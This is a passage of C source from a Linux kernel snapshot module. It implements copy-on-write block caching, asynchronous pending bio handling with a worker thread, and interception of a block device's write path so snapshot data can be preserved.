		sp->entry->page = (sp - 1)->page;
		sp->entry->max_key = map->stack[0].max_key;
		sp->entry++;
		(sp - 1)->page = 0;
		for (; !STOP_ENTRY(sp); sp->entry++) {
			sp->entry->max_key = ~0;
			sp->entry->page = 0;
		}
	}
	map->max_key = map->stack[0].max_key;
	map->level = --sp - map->stack;
	map->root = sp->page;
	sp->page = 0;
	if (destpage) {
		page_cache_release(destpage);
		inc_put_pages(s);
	}
	if (bubble) {
		page_cache_release(bubble);
		inc_put_pages(s);
	}
	for (sp = map->stack; sp <= max_sp; sp++)
		if (sp->page) {
			page_cache_release(sp->page);
			inc_put_pages(s);
		}
	if (ret)
		map_free(s);
	return ret;
}

static void map_init_iterator(struct group_map* map)
{
	struct stack_entry* sp;

	map->stack[map->level].page = map->root;
	for (sp = map->stack + map->level; sp > map->stack; ) {
		sp->entry = page_address(sp->page);
		sp--;
		sp->page = (sp+1)->entry->page;
	}
	map->stack[0].entry = kmap(map->stack[0].page);
}

static struct level0entry* map_iterator_get_value(struct group_map* map)
{
	return (struct level0entry*)map->stack[0].entry;
}

static int map_iterator_next(struct group_map* map)
{
	struct stack_entry* sp;

	struct stack0entry {
		struct page* page;
		struct level0entry* entry;
	}* sp0;

	sp0 = (struct stack0entry*)map->stack;
	sp0->entry++;

	if ((void*)(sp0->entry + 1) > page_address(sp0->page) + PAGE_SIZE ||
					sp0->entry->key > map->max_key) {
		kunmap(sp0->page);
		for (sp = map->stack + 1; sp <= map->stack + map->level; sp++) {
			sp->entry++;
			if (!STOP_ENTRY(sp) && sp->entry->page)
				break;
		}
		if (sp > map->stack + map->level)
			return 0;

		while (sp > map->stack) {
			sp--;
			sp->page = (sp+1)->entry->page;
			sp->entry = sp - map->stack ? page_address(sp->page)
							: kmap(sp->page);
		}
	}
	return 1;
}

static void map_iterator_stop(struct group_map* map)
{
	kunmap(map->stack[0].page);
}

static struct level0entry* map_search(struct group_map* map, unsigned long long key,
						struct page** entry_page)
{
	int level;
	struct page* page;
	int i, l, r;
	struct level0entry* array0;

	if (key > map->max_key)
		return 0;

	page = map->root;

	for (level = map->level; level; level--) {
		struct level_entry* array;

		array = page_address(page);
		l = 0;
		r = PAGE_SIZE / sizeof(struct level_entry) - 1;
		do {
			i = (l + r)/2;
			if (array[i].max_key >= key)
				r = i;
			else
				l = i + 1;
		} while (r != l);
		page = array[r].page;
	}

	array0 = kmap(page);
	l = 0;
	r = PAGE_SIZE / sizeof(struct level0entry) - 1;
	do {
		i = (l + r)/2;
		if (array0[i].key > key)
			r = i - 1;
		else if (array0[i].key < key)
			l = i + 1;
		else {
			*entry_page = page;
			return &array0[i];
		}
	} while (r >= l);
	entry_page = 0;
	kunmap(page);
	return 0;
}

#define sa_cache_chain_remove(s, chain, bno) \
	sa_cache_chain_read(s, chain, 0, bno, FAKE_READ, SNAP_READ_ONCE)

static int sa_cache_save(struct session_struct *s, void *data,
					unsigned long long bno)
{
	struct sa_page *sab;
	struct sa_chain *chain;
	int idx, bppage, ret, new_page;
	char *kaddr;
	struct group_entry* entry;
	struct page* entry_page;

	ret = 1;
	idx = 0;
	new_page = 0;
	bppage = s->s_bppage;
	entry_page = 0;
	entry = 0;

	sa_debug(DEBUG_API, "bno=%llu\n", bno);

	if (s->s_state == SNAP_READINGMAP && s->s_usemap)
		entry = (struct group_entry*)map_search(&s->s_groupmap, bno, &entry_page);

	chain = sa_get_blk_chain(s, bno);
	spin_lock(&chain->lock);

	/* The block may be already read while we were waiting on bio */
	if (!(s->s_state == SNAP_READINGMAP && s->s_usemap ?
			!!entry :
			!!is_block_in_map(&s->s_blkmap, bno))) {
		s->s_rwcolls++;
		ret = 0;
		goto out_unlock;
	}

	if (s->s_state == SNAP_READINGMAP)
		sa_cache_chain_remove(s, chain, bno);

	if (bppage > 1 && chain->free) {
		sab = chain->free;
		idx = find_free_on_page(sab, bppage, bno);
		goto copy_data;
	}
	sab = sa_cache_emget(s);
	if (!sab)
		goto out_unlock;
	sab->bno = bno;
	new_page = 1;
	if (bppage > 1)
		init_sa_page(sab, bppage);

copy_data:
	kaddr = sn_kmap_atomic(sab->page);
	memcpy(kaddr + idx * s->s_bsize, data, s->s_bsize);
	sn_kunmap_atomic(kaddr);

	if (s->s_state == SNAP_READINGMAP && s->s_usemap) {
		if (!entry->init)
			sa_debug(DEBUG_API, "INITING group %u bno = %llu\n",
						entry->group, entry->bno);
		entry->init = entry->cached = 1;
	} else if (s->s_state != SNAP_READINGMAP)
		clear_block_in_map(&s->s_blkmap, bno);

	s->s_cblocks++;
	if (s->s_cblocks - s->s_fcblocks > s->s_mcblocks)
		s->s_mcblocks = s->s_cblocks - s->s_fcblocks;

	ret = 0;
	if (bppage == 1) {
		insert_into_busy_list(chain, sab);
		goto out_unlock;
	}
	if (blocks_on_page(sab, bppage) == bppage) {
		remove_from_free_list(chain, sab);
		insert_into_busy_list(chain, sab);
		goto out_unlock;
	}
	if (new_page)
		insert_into_free_list(chain, sab);

out_unlock:
	spin_unlock(&chain->lock);
	if (entry_page)
		kunmap(entry_page);
	return ret;
}

/* return number of read bytes or error */
static int sa_cache_read(struct session_struct *s, void *data,
		unsigned long long bno, int mode, unsigned int flags)
{
	struct sa_chain *chain;
	int ret;

	chain = sa_get_blk_chain(s, bno);
	spin_lock(&chain->lock);

	ret = sa_cache_chain_read(s, chain, data, bno, mode, flags);

	spin_unlock(&chain->lock);
	return ret;
}

#if (DEBUG != 0) && (DEBUG_LEVEL & DEBUG_BIO)

#ifdef HAVE_OP_IS_WRITE
#define BIO_RW_RETURN_VALUE unsigned int
#else
#define BIO_RW_RETURN_VALUE unsigned long
#endif

static BIO_RW_RETURN_VALUE get_bio_req_flags(struct bio *bio)
{
#ifdef HAVE_BIO_OPF
	return bio->bi_opf;
#else
	return bio->bi_rw;
#endif
}

static void print_bio(struct bio *bio, char *pref)
{
	sa_warn("%s bio=%p, dev=%x, sector=%llu, bi_flags=%lx"
		" bi_rw=%lx bi_size=%d bi_vcnt=%d bi_io_vec=%p"
		" bi_max_vecs=%d\n", pref, bio,
		bio->bi_bdev ? bio->bi_bdev->bd_dev : -1,
		(unsigned long long)sn_bio_bi_sector(bio), bio->bi_flags,
		get_bio_req_flags(bio), sn_bio_bi_size(bio), bio->bi_vcnt, bio->bi_io_vec,
		bio->bi_max_vecs);
}
#define dump_bio(x, y) print_bio(x, y)
#else
#define dump_bio(x, y)
#endif

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
static int sa_cache_bio_end_io(struct bio *bio, unsigned int bytes_done,
                               int err)
{
 	if (sn_bio_bi_size(bio)) {
 		sa_warn("bio->bi_size is invalid\n");
 		dump_bio(bio, "sa_cache_bio_end_io");
 		return BIO_EIO_RET_VAL_ERR;
 	}

	complete((struct completion *)bio->bi_private);
	return BIO_EIO_RET_VAL_OK;
}
#else
#if LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
static void sa_cache_bio_end_io(struct bio *bio, int err)
#else
static void sa_cache_bio_end_io(struct bio *bio)
#endif // LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
{
	complete((struct completion *)bio->bi_private);
	return BIO_EIO_RET_VAL_OK;
}
#endif //if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
static int sa_pending_bio_end_io(struct bio *bio, unsigned int bytes_done,
                               int err)
#elif LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
static void sa_pending_bio_end_io(struct bio *bio, int err)
#else
static void sa_pending_bio_end_io(struct bio *bio)
#endif
{
	unsigned long flags;

	struct pending_request *preq = (struct pending_request*)
							bio->bi_private;
	struct pending_queue *pq = preq->pr_queue;
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
 	if (bio->bi_size) {
 		sa_warn("bio->bi_size is invalid\n")
 		dump_bio(bio, "sa_pending_bio_end_io");
	}
#endif
	spin_lock_irqsave(&pq->pq_lock, flags);
	if (pq->pq_state != PQ_RUNNING && pq->pq_state != PQ_CLOSED)
		BUG();
	preq->pr_ready++;
	if (preq->pr_ready != preq->pr_count) {
		spin_unlock_irqrestore(&pq->pq_lock, flags);
		return BIO_EIO_RET_VAL_OK;
	}

	/*
	 * All pq_bios are completed, so add request to ready requests
	 * list for later handling in process context.
	 */

	atomic_dec(&pq->pq_notready_req);
	atomic_inc(&pq->pq_ready_req);
	pqueue_add_request(pq, preq);
	spin_unlock_irqrestore(&pq->pq_lock, flags);
	complete(&pq->pq_bio_done);

	return BIO_EIO_RET_VAL_OK;
}

static struct pending_request* alloc_pending_request(int count)
{
	unsigned size = sizeof(struct pending_request) +
			count * sizeof(struct pending_read_request);
	struct pending_request* req;

	req = kmalloc(size, GFP_ATOMIC & ~__GFP_HIGH);
	if (req) {
		memset(req, 0, size);
		req->pr_count = count;
	}
	return req;
}

static struct pending_request* increase_pending_request
			(struct pending_request* oreq, unsigned count)
{
	unsigned ocount = oreq->pr_count;
	unsigned osize = sizeof(struct pending_request) +
			ocount * sizeof(struct pending_read_request);
	unsigned nsize = osize + count * sizeof(struct pending_read_request);
	struct pending_request* nreq;

	nreq = kmalloc(nsize, GFP_ATOMIC & ~__GFP_HIGH);
	if (nreq) {
		memset(nreq, 0, nsize);
		memcpy(nreq, oreq, osize);
		nreq->pr_count = count + ocount;
		kfree(oreq);
	} else {
		nreq = oreq;
	}
	return nreq;
}

static int submit_pending_request(struct session_struct *s,
	struct pending_request *preq, struct bio *wbio)
{
	struct pending_queue *pq = &s->s_pending_queue;
	int ready, not_ready, qstate;
	int ret, i;

	spin_lock_irq(&pq->pq_lock);
	ready = atomic_read(&pq->pq_ready_req);
	not_ready = atomic_read(&pq->pq_notready_req);
	qstate = pq->pq_state;
	BUG_ON(ready < 0);
	BUG_ON(not_ready < 0);
	if (ready + not_ready > s->s_blkcache_emmin) {
		s->s_async_retr++;
		ret = -EAGAIN;
		goto out_err;
	}
	if (qstate != PQ_RUNNING) {
		/* Seems pending queue was closed */
		ret = -EBADFD;
		goto out_err;
	}
	atomic_inc(&pq->pq_notready_req);
	spin_unlock_irq(&pq->pq_lock);
	preq->pr_next = NULL;
	preq->pr_wbio = wbio;
	preq->pr_queue = pq;

	for (i = 0; i < preq->pr_count; i++) {
		struct bio *bio = preq->pr_bios[i].rbio;
		bio->bi_private = preq;
		bio->bi_end_io = sa_pending_bio_end_io;
	}


	if (wbio)
		dump_bio(wbio, "sa_cache_block async case write");

	for (i = 0; i < preq->pr_count; i++) {
		struct bio *bio = preq->pr_bios[i].rbio;
		dump_bio(bio, "sa_cache_block async case read");
		sn_submit_bio(READ, bio);
	}
	return 0;

out_err:
	spin_unlock_irq(&pq->pq_lock);
	return ret;
}

static int sa_cache_save_bio(struct session_struct *s, struct bio *bio,
		unsigned long long bno)
{
	unsigned pg_idx;

	if (sn_is_error_bio(bio)) {
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		return 1;
	}
	for (pg_idx = 0; pg_idx < bio->bi_vcnt; pg_idx++) {
		struct bio_vec* bvec;	/* bio_vec of this page */
		unsigned int pg_off;	/* block offset withing page */

		bvec = bio->bi_io_vec + pg_idx;
		for (pg_off = 0; pg_off < bvec->bv_len; pg_off +=s->s_bsize) {
			if (sa_cache_save(s, page_address(bvec->bv_page) +
					pg_off + bvec->bv_offset, bno++))
				return 1;
		}
	}
	return 0;
}

static void destroy_cached_bio(struct session_struct *s, struct bio *bio)
{
	int i;
	unsigned nr_pages;

	if (!bio)
		return;

	nr_pages = bio->bi_vcnt;
	for (i = 0; i < nr_pages; i++) {
		if (bio->bi_io_vec[i].bv_page) {
			page_cache_release(bio->bi_io_vec[i].bv_page);
			inc_put_pages(s);
		}
	}
	bio_put(bio);
}

static struct bio* noinline sa_cache_alloc_bio(struct session_struct *s,
		unsigned long long bno, int nr_pages)
{
	struct page *page;
	struct bio *bio;
	int i = 0;

#ifndef HAVE_BIO_ALLOC_2ARGS
	bio = bio_alloc(s->s_bdev, nr_pages, 0, GFP_NOIO);
#else
	bio = bio_alloc(GFP_NOIO, nr_pages);
#endif
	if (!bio)
		goto out;
#ifdef HAVE_BVEC_ITER
	bio->bi_iter.bi_sector = ((sector_t) bno) * s->s_spb;
#else
	bio->bi_sector = ((sector_t) bno) * s->s_spb;
#endif
#ifdef HAVE_BIO_ALLOC_2ARGS
#ifndef HAVE_BIO_SET_DEV
	bio->bi_bdev = s->s_bdev;
#else
	bio_set_dev(bio, s->s_bdev);
#endif
#endif
	for (i = 0; i < nr_pages; i++) {
		page = alloc_page(GFP_NOIO);
		if (!page)
			goto out;
		inc_get_pages(s);
		if (unlikely(!bio_add_page(bio, page, PAGE_SIZE, 0))) {
			page_cache_release(page);
			inc_put_pages(s);
			if (!s->s_mbio || s->s_mbio > i)
				s->s_mbio = i;
			break;
		}
	}

	return bio;
out:
	sa_warn("Memory shortage: pages=%d, i=%d\n", nr_pages, i);
	destroy_cached_bio(s, bio);
	return 0;
}

static int noinline sa_cache_block(struct session_struct *s,
		struct bio *orig_bio, unsigned long long bno,
		unsigned int nr_blocks,	int *pended)
{
	int i, nr_pages, nr_bios, iprs;
	struct pending_request* preq;
	int ret = -ENOMEM;

	nr_pages = ((nr_blocks - 1) / s->s_bppage) + 1;
	nr_bios = ((nr_pages - 1) / MAX_RDPAGES) + 1;

	preq = alloc_pending_request(nr_bios);
	if (preq == NULL)
		goto out;
	iprs = i = 0;
	do {
		unsigned bsize;
		struct pending_request* preq2;
		int count = MAX_RDPAGES < nr_pages ? MAX_RDPAGES : nr_pages;
		preq->pr_bios[i].rbio = sa_cache_alloc_bio(s, bno, count);
		preq->pr_bios[i].rblkno = bno;
		if (!preq->pr_bios[i].rbio)
			goto out;
		bsize = sn_bio_bi_size(preq->pr_bios[i].rbio) >> PAGE_SHIFT;
		bno += bsize * s->s_bppage;
		nr_pages -= bsize;
		dump_bio(preq->pr_bios[i].rbio, "sa_cache_block read ");
		i++;
		if (nr_pages && i == nr_bios) {
			unsigned incr = ((nr_pages - 1) / MAX_RDPAGES) + 1;
			preq2 = increase_pending_request(preq, incr);
			s->s_iprcnt++;
			iprs++;
			if (preq2 == preq) {
				sa_warn("Increase preq failed. inc=%u\n", incr);
				goto out;
			}
			preq = preq2;
			nr_bios = preq->pr_count;
		}
	} while (nr_pages);
	if (iprs > s->s_mipr)
		s->s_mipr = iprs;
	preq->pr_count = i;
	sa_debug(DEBUG_BIO, "Request inited: blocks=%u, bios=%d\n",
							nr_blocks, i);

resubmit:
	ret = submit_pending_request(s, preq, orig_bio);
	if (unlikely(ret == -EAGAIN)) {
		schedule();
		goto resubmit;
	}
	if (unlikely(ret))
		goto out;
	*pended = 1;
	s->s_async_req++;
	return 0;

out:
	destroy_pending_request(s, preq);
	return ret;
}

static int noinline sa_cache_bio(struct session_struct *s, struct bio *bio,
								int *pended)
{
	unsigned long long sbno, ebno, i;
	unsigned long long sbno_cow, ebno_cow;
	sector_t start, end; /* relative to part start */

	dump_bio(bio, "sa_cache_bio");
	start = sn_bio_bi_sector(bio) - s->s_pstart;
	if (sn_bio_bi_sector(bio) < s->s_pstart)
		start = 0;
	end = sn_bio_bi_sector(bio) + (sn_bio_bi_size(bio) >> 9) - s->s_pstart;
	if (end > s->s_plen)
		end = s->s_plen;
	sbno = start >> s->s_spbshift;
	ebno = (end + s->s_spb - 1) >> s->s_spbshift;
	sbno_cow = ebno + 1;
	ebno_cow = sbno;
	for (i = sbno; i < ebno; i++) {
		if (is_block_in_map(&s->s_blkmap, i)) {
			sbno_cow = i;
			ebno_cow = i + 1;
			break;
		}
	}
	/* Where is no block in map */
	if (sbno_cow > ebno) {
		*pended = 0;
		return 0;
	}
	for (i = ebno - 1; i > sbno_cow; i--) {
		if (is_block_in_map(&s->s_blkmap, i)){
			ebno_cow = i + 1;
			break;
		}
	}
	if (sa_cache_block(s, bio, sbno_cow, ebno_cow - sbno_cow, pended))
		return 1;
	return 0;
}

static int noinline sa_save_bio_to_cache(struct session_struct *s,
							struct bio *bio)
{
	unsigned int pg_idx;
	unsigned long long bno;
	sector_t start; /* relative to part start */

	start = sn_bio_bi_sector(bio) - s->s_pstart;
	if (sn_bio_bi_sector(bio) < s->s_pstart)
		start = 0;
	bno = start >> s->s_spbshift;

	for (pg_idx = 0; pg_idx < bio->bi_vcnt; pg_idx++) {
		struct bio_vec* bvec;	/* bio_vec of this page */
		unsigned int pg_off;	/* block offset withing page */

		bvec = bio->bi_io_vec + pg_idx;
		for (pg_off = 0; pg_off < bvec->bv_len; pg_off +=s->s_bsize) {
			if (sa_cache_save(s, page_address(bvec->bv_page) +
					pg_off + bvec->bv_offset, bno++))
				return 1;
		}
	}
	return 0;
}

static void noinline wait_for_users(struct session_struct *s)
{
	spin_lock(&sessions_lock);
	while (!atomic_dec_and_test(&s->s_users)) {
		atomic_inc(&s->s_users);
		spin_unlock(&sessions_lock);
		schedule();
		spin_lock(&sessions_lock);
	}
	atomic_inc(&s->s_users);
}

static int noinline session_handle_bio(struct session_struct *s,
					struct bio *bio, int *pended)
{
	int state;

	state = s->s_state;
	dump_bio(bio, "session_make_request write");
	if (state == SNAP_FREEZING || state == SNAP_FROZEN ||
					state == SNAP_INITINGMAP) {
		if (!delay_bio(s, bio)) {
			*pended = 1;
			return 0;
		}
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		sa_debug(DEBUG_API, "SNAP_FREEZE_ERR s=%p\n", s);
		unregister_make_request(s);
		sn_thaw_bdev(s);
		/* pass bh to original handler */
	} else if (state == SNAP_MAPPED) {
		if (!sa_cache_bio(s, bio, pended))
			return 0;
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		sa_debug(DEBUG_API, "SNAP_MAPPED s=%p\n", s);
		unregister_make_request(s);
	} else if (state == SNAP_READINGMAP) {
		*pended = 0;
		if (!sa_save_bio_to_cache(s, bio))
			return 0;
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		sa_debug(DEBUG_API, "SNAP_READINGMAP s=%p\n", s);
		unregister_make_request(s);
	}
	return 1;
}

static void handle_pending_request(struct session_struct *s)
{
	struct pending_queue *pq = &s->s_pending_queue;
	struct pending_request *preq;
	int i;

	spin_lock_irq(&pq->pq_lock);
	preq = pqueue_get_request(pq);
	atomic_dec(&pq->pq_ready_req);
	spin_unlock_irq(&pq->pq_lock);

	BUG_ON(!preq);
	for (i = 0; i < preq->pr_count; i++) {
		struct bio *rbio = preq->pr_bios[i].rbio;
		unsigned long long rblkno = preq->pr_bios[i].rblkno;

		BUG_ON(!rbio);
		if (sa_cache_save_bio(s, rbio, rblkno)) {
			sn_set_mb(s->s_state, SNAP_READING_ERR);
			sa_debug(DEBUG_API, "SNAP_READING_ERR s=%p\n", s);
			unregister_make_request(s);
		}
	}

	if (preq->pr_wbio)
		generic_make_request(preq->pr_wbio);

	destroy_pending_request(s, preq);
}

/*
 * Worker thread that handles pending bios, to avoid blocking in our
 * make_request_fn.
 */
static int pending_req_handler_thread(void *data)
{
	struct session_struct *s = data;
	struct pending_queue *pq =  &s->s_pending_queue;
	atomic_inc(&s->s_users);
#ifdef USE_KERNEL_THREAD
	daemonize("pending_bio%x", s->s_kdev);
#endif
	/*current->flags |= PF_NOFREEZE;*/
	set_user_nice(current, -20);
	spin_lock_irq(&pq->pq_lock);
	BUG_ON(pq->pq_state != PQ_STOPPED);
	pq->pq_state = PQ_RUNNING;
	spin_unlock_irq(&pq->pq_lock);
	/*
	 * complete it, we are running
	 */
	complete(&pq->pq_done);

	while (1) {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,11)
		wait_for_completion(&pq->pq_bio_done);
#else
		if (wait_for_completion_interruptible(&pq->pq_bio_done)) {
			if (!s->s_simulate_freeze)
				snapapi_try_to_freeze();
			continue;
		}
#endif
		if (!atomic_read(&pq->pq_ready_req)) {
			/*
			 * ->pq_bio_done was completed but queue is empty.
			 * This fake event was generated by session unregister
			 * routine. We have to wait untill all notready pending
			 * requests become ready. After all pending requests
			 * will be handled we may safely exit.
		 	 */
			spin_lock_irq(&pq->pq_lock);
			if (pq->pq_state != PQ_CLOSED) {
				sa_debug(DEBUG_API, "close queue notready=%d\n",
						atomic_read(&pq->pq_ready_req));
				pq->pq_state = PQ_CLOSED;
			}
			spin_unlock_irq(&pq->pq_lock);
			goto check_queue;
		}

		handle_pending_request(s);
check_queue:
		if (pq->pq_state == PQ_CLOSED) {
			spin_lock_irq(&pq->pq_lock);
			if (!atomic_read(&pq->pq_notready_req) &&
					!atomic_read(&pq->pq_ready_req)) {
				/* All pending requests was handled */
				spin_unlock_irq(&pq->pq_lock);
				break;
			}
			spin_unlock_irq(&pq->pq_lock);
		}
	}
	pq->pq_state = PQ_STOPPED;
	complete(&pq->pq_done);
	atomic_dec(&s->s_users);
	return 0;
}

static int start_req_handler_thread(struct session_struct *s)
{
	int ret;
#ifndef USE_KERNEL_THREAD
	struct task_struct *th;
	th = kthread_create(pending_req_handler_thread, s, "snapapi_prht");
	if (IS_ERR(th)) {
		ret = IS_ERR(th);
		sa_debug(DEBUG_API, "Can't create thread err=%d.\n", ret);
		return ret;
	}
	wake_up_process(th);
#else
	ret = kernel_thread(pending_req_handler_thread, s, CLONE_KERNEL);
	if (ret < 0) {
		sa_debug(DEBUG_API, "Can't create thread err=%d.\n", ret);
		return ret;
	}
#endif
	wait_for_completion(&s->s_pending_queue.pq_done);
	return 0;
}

static void stop_req_handler_thread(struct session_struct *s, int wait)
{
	int ready, not_ready, qstate;
	struct pending_queue *pq;

	pq = &s->s_pending_queue;
restart:
	spin_lock_irq(&pq->pq_lock);
	ready = atomic_read(&pq->pq_ready_req);
	not_ready = atomic_read(&pq->pq_notready_req);
	spin_unlock_irq(&pq->pq_lock);
	qstate = pq->pq_state;
	BUG_ON(ready < 0);
	BUG_ON(not_ready < 0);
	if (wait && (ready + not_ready)) {
		schedule();
		goto restart;
	}
	if (qstate != PQ_STOPPED) {
		/* Send close event to pending queue and
		 * wait while it stopped */
		complete(&pq->pq_bio_done);
		wait_for_completion(&pq->pq_done);
		BUG_ON(pq->pq_state != PQ_STOPPED);
	}
}
#ifdef HAVE_BDOPS_SUBMIT_BIO
#ifdef _PRINTK_ADDR
MAKE_REQUEST_RETURN_VALUE (*_sn_blk_mq_submit_bio)(struct bio *) = (BLK_MQ_SUBMIT_BIO_ADDR != 0) ?
        (MAKE_REQUEST_RETURN_VALUE (*)(struct bio *)) (BLK_MQ_SUBMIT_BIO_ADDR + (long long)(((void *)_printk) - (void *)_PRINTK_ADDR)) : NULL;
#elif PRINTK_ADDR
MAKE_REQUEST_RETURN_VALUE (*_sn_blk_mq_submit_bio)(struct bio *) = (BLK_MQ_SUBMIT_BIO_ADDR != 0) ?
        (MAKE_REQUEST_RETURN_VALUE (*)(struct bio *)) (BLK_MQ_SUBMIT_BIO_ADDR + (long long)(((void *)printk) - (void *)PRINTK_ADDR)) : NULL;
#else
#error "Cannot find _printk or printk symbol"
#endif

static MAKE_REQUEST_RETURN_VALUE sn_blk_mq_submit_bio(struct bio *bio)
{
	sn_request_queue *q = sn_bio_queue(bio);

	percpu_ref_get(&q->q_usage_counter);
	return _sn_blk_mq_submit_bio(bio);
}

static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_queue_mq_based ? sn_blk_mq_submit_bio : s->s_make_request_fn;
}

#elif defined(HAVE_BLK_MQ_MAKE_REQUEST)
static MAKE_REQUEST_RETURN_VALUE sa_mq_make_request(sn_request_queue *q, struct bio *bio)
{
	percpu_ref_get(&q->q_usage_counter);
	return blk_mq_make_request(q, bio);
}

static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_queue_mq_based ? sa_mq_make_request : s->s_make_request_fn;
}
#else
static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_make_request_fn;
}
#endif

#ifdef HAVE_BDOPS_SUBMIT_BIO
static MAKE_REQUEST_RETURN_VALUE snapapi_ops_submit_bio(struct bio *bio)
{
	sn_request_queue *q = sn_bio_queue(bio);
#else
static MAKE_REQUEST_RETURN_VALUE snapapi_make_request(sn_request_queue *q, struct bio *bio)
{
#endif
	struct session_struct *s;
	make_request_fn *fn;
	int state;
	int pended = 0;

#ifdef HAVE_BDOPS_SUBMIT_BIO
	const struct block_device_operations *fops;
#ifdef HAVE_BIO_BI_BDEV
	fops = bio->bi_bdev->bd_disk->fops;
#else
	fops = bio->bi_disk->fops;
#endif
#endif
	s = NULL;
	fn = NULL;
	while (1) {
		spin_lock(&sessions_lock);
		if (!s)
#ifdef HAVE_BDOPS_SUBMIT_BIO
			s = find_by_fops(fops);
		else
			s = find_by_fops_next(fops, s);
#else
			s = find_by_queue(bio, q);
		else
			s = find_by_queue_next(bio, q, s);
#endif
		if (!s) {
			spin_unlock(&sessions_lock);
			break;
		}
		atomic_inc(&s->s_users);
		spin_unlock(&sessions_lock);
		if (!fn)
			fn = sa_get_make_request_fn(s);

		if (!sn_op_is_write(bio) || !sn_bio_bi_size(bio)) {
			dump_bio(bio, "sesson_make_request read");
			atomic_dec(&s->s_users);
			break;
		}

		if (s->s_request_queue != q)
			goto next_session;

		state = s->s_state;
		if (state == SNAP_FREEZING) /* freeze whole device */
			goto next_session;
		/*
		 * We assume what bio already remapped to disk by
		 * generic_make_request(), so device cant be partition here.
		 */
#ifdef HAVE_BIO_SET_DEV
#ifdef HAVE_BI_PARTNO
		if (bio->bi_partno) {
#else
		if (bio->bi_bdev->bd_partno && !bio_flagged(bio, BIO_REMAPPED)) {
#endif
			sa_warn("device bio_dev(%x) is a partition\n", bio_dev(bio));
		}
#else
		if (bio->bi_bdev->bd_contains != bio->bi_bdev) {
			dev_t ddev;
			ddev = bio->bi_bdev->bd_contains ? bio->bi_bdev->bd_contains->bd_dev : 0;
			sa_warn("bi_dev(%x) != bd_contains(%x)\n", bio->bi_bdev->bd_dev, ddev);
		}
#endif
		if (snapapi_is_not_our_bio(s, bio))
			goto next_session;
		session_handle_bio(s, bio, &pended);
		if (pended) {
			/* bio was pended and will be handled anisochronous */
			atomic_dec(&s->s_users);
			return MAKE_REQUEST_EXIT_STATUS;
		}
next_session:
		atomic_dec(&s->s_users);
	}
	if (unlikely(!fn)) {
#ifdef HAVE_BDOPS_SUBMIT_BIO
		fn = fops->submit_bio;
		if (!fn)
			fn = sn_blk_mq_submit_bio;
#else
		fn = q->make_request_fn;
#endif
		if (!fn) {
#ifdef HAVE_BLK_MQ_MAKE_REQUEST
			fn = sa_mq_make_request;
#else
			goto out_err;
#endif
		}
#ifndef HAVE_BDOPS_SUBMIT_BIO
		if (fn == snapapi_make_request)
#else
		if (fn == snapapi_ops_submit_bio)
#endif
			goto out_err;
	}

#ifdef HAVE_BDOPS_SUBMIT_BIO
	return fn(bio);
#else
	return fn(q, bio);
#endif

out_err:
	sn_bio_io_error(bio);
	return MAKE_REQUEST_EXIT_STATUS;
}

static int register_make_request(struct session_struct * s)
{
	sn_request_queue *q;
	struct list_head *tmp;
	sa_debug(DEBUG_API, "\n");
	q = snapapi_get_dev_queue(s);
	if (!q)
		return 1;
	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
		struct session_struct *tmp_s;
		tmp_s = list_entry(tmp, struct session_struct, s_list);
#ifdef HAVE_BDOPS_SUBMIT_BIO
		if (tmp_s->s_request_queue &&
			s->s_bdev->bd_disk->fops == tmp_s->s_bdev->bd_disk->fops) {
#else
		if (tmp_s->s_request_queue == q) {
#endif
			s->s_request_queue = q;
			s->s_make_request_fn = tmp_s->s_make_request_fn;
			s->s_queue_mq_based = tmp_s->s_queue_mq_based;
			spin_unlock(&sessions_lock);
			sa_debug(DEBUG_API, "Keep queue as is.\n");
			return 0;
		}
	}
	spin_unlock(&sessions_lock);
	s->s_request_queue = q;
#ifndef HAVE_BDOPS_SUBMIT_BIO
	s->s_make_request_fn = q->make_request_fn;
#else
	sa_debug(DEBUG_API, "saving original fops->submit_bio %p in s %p", s->s_bdev->bd_disk->fops->submit_bio, s);
	s->s_make_request_fn = s->s_bdev->bd_disk->fops->submit_bio;
#endif
	if (!s->s_make_request_fn) {
#if !(defined HAVE_BDOPS_SUBMIT_BIO) && !(defined HAVE_BLK_MQ_MAKE_REQUEST)
		sa_warn("s=%p(%x) queue make_request_fn is NULL and blk_mq_make_request is not defined", s, s->s_kdev);
		return 1;
#endif
		sa_debug(DEBUG_API, "s=%p(%x) s_queue_mq_based is 1", s, s->s_kdev);
		s->s_queue_mq_based = 1;
	}
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_lock_dev_queue(&q);
#else
	snapapi_lock_dev_queue(q);
#endif
#ifndef HAVE_BDOPS_SUBMIT_BIO
	q->make_request_fn = snapapi_make_request;
#else
	snapapi_set_submit_bio_fn(s->s_bdev, snapapi_ops_submit_bio);
#endif
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_unlock_dev_queue(&q);
#else
	snapapi_unlock_dev_queue(q);
#endif
	sa_kdebug("OK. kdev=%x:%x, mq=%u.\n", MAJOR(s->s_kdev), MINOR(s->s_kdev), s->s_queue_mq_based);
	return 0;
}

static void unregister_make_request(struct session_struct * s)
{
	sn_request_queue *q;
	struct list_head *tmp;
	sa_debug(DEBUG_API, "s=%p\n", s);

	q = s->s_request_queue;
	if (!q)
		return;

	if (!s->s_make_request_fn && !s->s_queue_mq_based) {
		sa_warn("s=%p(%x) queue s_make_request_fn is NULL for non mq-based session", s, s->s_kdev);
		return;
	}

	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
	struct session_struct *tmp_s;
		tmp_s = list_entry(tmp, struct session_struct, s_list);
#ifdef HAVE_BDOPS_SUBMIT_BIO
